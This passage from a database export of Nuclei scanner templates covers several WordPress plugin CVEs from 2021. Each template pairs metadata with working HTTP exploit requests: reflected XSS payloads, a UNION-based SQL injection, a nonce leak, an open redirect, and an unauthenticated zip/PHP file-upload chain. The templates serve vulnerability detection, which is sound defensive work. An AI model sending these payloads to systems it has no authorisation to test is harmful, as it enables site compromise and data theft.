"ba2b739b81fbda9b62ba611875872d51", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a3" }, "name": "CVE-2021-24275.yaml", "content": "id: CVE-2021-24275\n\ninfo:\n name: Popup by Supsystic <1.10.5 - Cross-Site scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected 
cross-site scripting issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f\n - http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24275\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24275\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: supsystic\n product: popup\n framework: wordpress\n tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202e8b612008e7b0431de014a13bfb6d727ae9e6d71ea87d4d29754936012f118e022100bb024808d77aed7e62c623b62b8e653220673c8f814fb7575dfa7f7df1056248:922c64590222798bb761d5b6d8e72950", "hash": "7dfd76c10bc360eece76f9c60f45d2df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a4" }, "name": "CVE-2021-24276.yaml", "content": "id: CVE-2021-24276\n\ninfo:\n name: WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: 
WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c\n - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24276\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24276\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: supsystic\n product: contact_form\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ccf19553c3785450c335d57b9e48236787603b65f193d92a7aa7845a9f18ea87022100bfc9570db36ebaebe97547ffa74f02f047c2ae49cca8f2653f2c9dbf1e5bab3c:922c64590222798bb761d5b6d8e72950", "hash": "ec47f851843d73ec3f06b43792878fa5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3082a5" }, "name": "CVE-2021-24278.yaml", "content": "id: CVE-2021-24278\n\ninfo:\n name: WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation\n author: 2rs3c\n severity: high\n description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.\n impact: |\n Attackers can exploit this vulnerability to perform actions on behalf of authenticated users, leading to potential data breaches or unauthorized access.\n remediation: |\n Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability.\n reference:\n - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413\n - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24278\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24278\n cwe-id: CWE-863\n epss-score: 0.05506\n epss-percentile: 0.93039\n cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: querysol\n product: redirection_for_contact_form_7\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php\"\n\n body: \"action=wpcf7r_get_nonce¶m=wp_rest\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - '\"success\":true'\n - '\"nonce\":\"[a-f0-9]+\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - '\"nonce\":\"[a-f0-9]+\"'\n part: body\n# digest: 
4b0a00483046022100d9abb764ee6563027af072cc23d4c9c16f80410112aba32996d15ad9d82c5a5a022100e439314dc9a6527a0d80b588b231ae631ee122f0d97542b41b800ffed7a3f51f:922c64590222798bb761d5b6d8e72950", "hash": "5f4a22e6477adcdd8461c8156f8276f6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a6" }, "name": "CVE-2021-24284.yaml", "content": "id: CVE-2021-24284\n\ninfo:\n name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload\n author: lamscun,pussycat0x,pdteam\n severity: critical\n description: |\n WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website.\n remediation: |\n Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5\n - https://github.com/advisories/GHSA-wqvg-8q49-hjc7\n - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/\n - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/\n - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24284\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24284\n cwe-id: CWE-434\n epss-score: 0.96657\n epss-percentile: 0.99614\n cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:*\n metadata:\n 
max-request: 2\n vendor: kaswara_project\n product: kaswara\n framework: wordpress\n tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project\nvariables:\n zip_file: \"{{to_lower(rand_text_alpha(6))}}\"\n php_file: \"{{to_lower(rand_text_alpha(2))}}.php\"\n php_cmd: \"\"\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n --------------------------d3be34324392a708\n Content-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\n Content-Type: application/octet-stream\n\n {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n --------------------------d3be34324392a708\n Content-Disposition: form-data; name=\"fontsetname\"\n\n {{zip_file}}\n --------------------------d3be34324392a708\n Content-Disposition: form-data; name=\"action\"\n\n uploadFontIcon\n --------------------------d3be34324392a708--\n - |\n GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - \"wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css\"\n\n - type: word\n part: body_2\n words:\n - \"phpinfo()\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e1a752336a035ad58ba8e8890423741186763e78ae3b2667af5b0960c551a67b02200e3e7d2f1037d51705f684c0eb909f58a0c7006c413973abe7884f18771d8cdc:922c64590222798bb761d5b6d8e72950", "hash": "2b8d529e73e45f49dc4a25b267e8d79b", "level": 6, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a7" }, "name": "CVE-2021-24285.yaml", "content": "id: CVE-2021-24285\n\ninfo:\n name: WordPress Car Seller - Auto Classifieds Script - SQL Injection\n author: ShreyaPohekar\n severity: critical\n description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script.\n reference:\n - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/\n - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162\n - https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24285\n cwe-id: CWE-89\n epss-score: 0.21023\n epss-percentile: 0.95973\n cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: cars-seller-auto-classifieds-script_project\n product: cars-seller-auto-classifieds-script\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n 
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220172be49164feec344dfa1d49f0cdf335917a5d2a75846fce80ea6e1bbe5b7bee02210089fab324ff44731061d8adcd715f206c9c089bd9a7fe64fea86c8c3aedf97623:922c64590222798bb761d5b6d8e72950", "hash": "4511ddfdfa9e3de8bb774f7f74a04693", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a8" }, "name": "CVE-2021-24286.yaml", "content": "id: CVE-2021-24286\n\ninfo:\n name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.\n remediation: Fixed in version 1.3.1\n reference:\n - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27\n - https://www.exploit-db.com/exploits/50350\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24286\n - https://wordpress.org/plugins/redirect-404-to-parent/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24286\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: mooveagency\n product: redirect_404_to_parent\n framework: wordpress\n tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")'\n - 'status_code_2 == 200'\n condition: and\n# digest: 4b0a004830460221009c8a16dca3ea8098cdf84c96ec66655812cb68fb55b9e286f7fe420d60faa9110221009d1a382904cfdd55a6f49320a79ef9b8f3b938ad8bc9db2d8b1fadfd597b6e3d:922c64590222798bb761d5b6d8e72950", "hash": "56b03ef5662367ca469ef56062ea681c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a9" }, "name": "CVE-2021-24287.yaml", "content": "id: CVE-2021-24287\n\ninfo:\n name: WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.3.2.\n reference:\n - https://www.exploit-db.com/exploits/50349\n - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf\n - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24287\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24287\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: mooveagency\n product: select_all_categories_and_taxonomies\\,_change_checkbox_to_radio_buttons\n framework: wordpress\n tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\")'\n - 'contains(body_2, \"Set up the taxonomies\")'\n condition: and\n# digest: 
490a004630440220331de77e11f4fd8c6eb5947ea08b967c217e35cecc249be01ac24e264c67cb8402205f29a68c7018c29021c2f9a42175170a1c54ed085d505a1ed2d012236cac7ec8:922c64590222798bb761d5b6d8e72950", "hash": "ccd6505429c52e795fd7ad459eea99d0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082aa" }, "name": "CVE-2021-24288.yaml", "content": "id: CVE-2021-24288\n\ninfo:\n name: WordPress AcyMailing <7.5.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24288\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24288\n cwe-id: CWE-601\n epss-score: 0.00129\n epss-percentile: 0.47456\n cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: acymailing\n product: acymailing\n framework: wordpress\n tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - 
'(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022100dea3cbf54f50326db8a7cbe9c797a7d01e224af22ec2b849fde4047988e95b50022052cd3007e67dc0c21a9cb9d2bb25fce7cf31bb2d63ecfe1d826358cfb03c9983:922c64590222798bb761d5b6d8e72950", "hash": "f192acc3c13077299bf8a4f59c5588e9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ab" }, "name": "CVE-2021-24291.yaml", "content": "id: CVE-2021-24291\n\ninfo:\n name: WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: |\n WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update WordPress Photo Gallery by 10Web to version 1.5.69 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a\n - https://packetstormsecurity.com/files/162227/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24291\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24291\n cwe-id: CWE-79\n epss-score: 0.00084\n epss-percentile: 0.34815\n cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: 10web\n product: photo_gallery\n framework: wordpress\n tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n words:\n - \"onmouseover=alert(document.domain)//\"\n - \"wp-content/uploads/photo-gallery\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220530060b9231214c3948331f2fc9151166f95e489be988572b86a607150d1ef12022100aacb96e91813386ae60992bae5c87ad91e0ca09b7a1801f42b2d7cdf30950423:922c64590222798bb761d5b6d8e72950", "hash": "53218cfcebeae0e966275b9027db7988", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ac" }, "name": "CVE-2021-24298.yaml", "content": "id: CVE-2021-24298\n\ninfo:\n name: WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability.\n reference:\n - https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/\n - https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24298\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24298\n cwe-id: CWE-79\n epss-score: 0.00123\n epss-percentile: 
0.45761\n cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ibenic\n product: simple_giveaways\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '= Simple Giveaways'\n\n - method: GET\n path:\n - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100934bf7080b3d93a65ddd9caff54bd309aa1d8788dc598dd103b6357cdfb57011022014bb7403e7c0e8b16169d4a25120d2dc0dae91f23747101e193be8c8125c3ce8:922c64590222798bb761d5b6d8e72950", "hash": "078238e963fb5044b6aebf9af53a2b5a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ad" }, "name": "CVE-2021-24300.yaml", "content": "id: CVE-2021-24300\n\ninfo:\n name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24300\n - 
https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24300\n cwe-id: CWE-79\n epss-score: 0.00338\n epss-percentile: 0.70768\n cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: pickplugins\n product: product_slider_for_woocommerce\n framework: wordpress\n tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'value=\"\\\"onmouseover=alert(document.domain);//\">'\n - \"PickPlugins Product Slider\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c921ac5e1370ee8254b2f60b17eb43e9636eab5381b19d528ddffe26ebbd0e670220460bf20def01d52a5c93aca05c79a748d9244053258932d97f65ccb5323b410a:922c64590222798bb761d5b6d8e72950", "hash": "c55e22a80053e968fd3725c817d6991e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ae" }, "name": "CVE-2021-24316.yaml", "content": "id: CVE-2021-24316\n\ninfo:\n name: WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. 
The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Mediumish Theme plugin (1.0.47 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e\n - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt\n - https://www.wowthemes.net/themes/mediumish-wordpress/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24316\n - https://github.com/ZephrFish/AutoHoneyPoC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24316\n cwe-id: CWE-79\n epss-score: 0.00317\n epss-percentile: 0.69851\n cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wowthemes\n product: mediumish\n framework: wordpress\n tags: cve2021,cve,mediumish,xss,wordpress,wpscan,intrusive,wowthemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E \"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - Sorry, no posts matched your criteria.\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ae8fcc2d6914ccc76596fda76037f35a2be4f783e8235640658b1ddcca4fd0d02204cfde07015adbd07b9e358a136ff26a457fd6c72dea188f3957fcd0e55048236:922c64590222798bb761d5b6d8e72950", "hash": "65d9fa0079e7c2a541297f8be3454021", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082af" }, "name": "CVE-2021-24320.yaml", "content": 
